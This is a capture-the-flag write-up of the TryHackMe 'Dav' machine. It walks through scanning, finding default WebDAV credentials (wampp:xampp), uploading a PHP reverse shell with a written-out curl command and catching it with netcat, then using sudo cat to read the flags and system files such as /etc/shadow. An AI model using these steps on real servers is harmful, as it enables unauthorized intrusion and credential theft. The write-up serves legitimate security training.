Dav (THM)

TryHackMeDav Write-Up

topics: Web application security

  1. Enumeration

  2. Local Privilege Escalation (Exploitation)

  3. Root Privilege Escalation

new tools: cadaver

tools: nmapAutomator, dirsearch, curl, kali webshells

Enumeration

Initial nmap scan ./nmapAutomator.sh $ip Basic

The only port that appears to be open is port 80 http. Lets run a vulnerability scan and dirsearch

./nmapAutomator $ip Vulns

python3 dirsearch.py -u $ip -e php,html,txt

There appears to be only one subdirectory /webdav. Attempting to navigate to this page as well as run dirsearch or gobuster against /webdav results in a 401 unauthorized access

Attempting to use the server version on searchsploit yields nuanced exploits that would not be practical for this CTF challenge.

I attempted this exploit but did not realize it only worked with 201 code

This lead me to googling "webdav exploit" which proved useful as it revealed default creds wampp:xampp

Local Privilege Escalation

The passwd.dav file contains a hash that I was unable to crack, however, after more googling I discovered an interesting command cadaver (a CLI WebDav client)

I then learned from this Null Byte article how to achieve a shell on a webdav server.

Exploit steps:

  • We will need a PHP shell, copy a default one from Kali to the /root directory cp /usr/share/webshells/php/php-reverse-shell.php .

    • edit the IP to the attacker IP and desired port

  • Upload the reverse shell to the webdav server with curl (initially I tried to use get from the server CLI but if it is already on the Kali machine, you can use put) curl http://10.10.66.11/webdav/shell.php -u wampp:xampp --upload-file php-reverse-shell.php

  • listen with nc on the port

  • navigate to the /webdav/shell.php and open the file

Root Privilege Escalation

First things first in Linux sudo -l

So our user has sudo privileges with cat. We can simply view the flags with

sudo cat /home/merlin/user.txt

sudo cat /root/root.txt

To get a reverse shell with a terminal with user or root privilege would be tricky. We can read the password file /etc/shadow and the sudoers file /etc/sudoers but we cant change users without a terminal even if we can crack the password. There is no other place to login as the user merlin or even send a shell back to us, as far as I can see at the moment. Maybe there is a kernel exploit we can use, I can always transfer LinPEAS to enumerate. This will be a good post-exploitation exercise to return to.

This machine has the same kernel as Fowsniff, which used a kernel exploit to spawn a root shell, we can attempt to use this same exploit

Last updated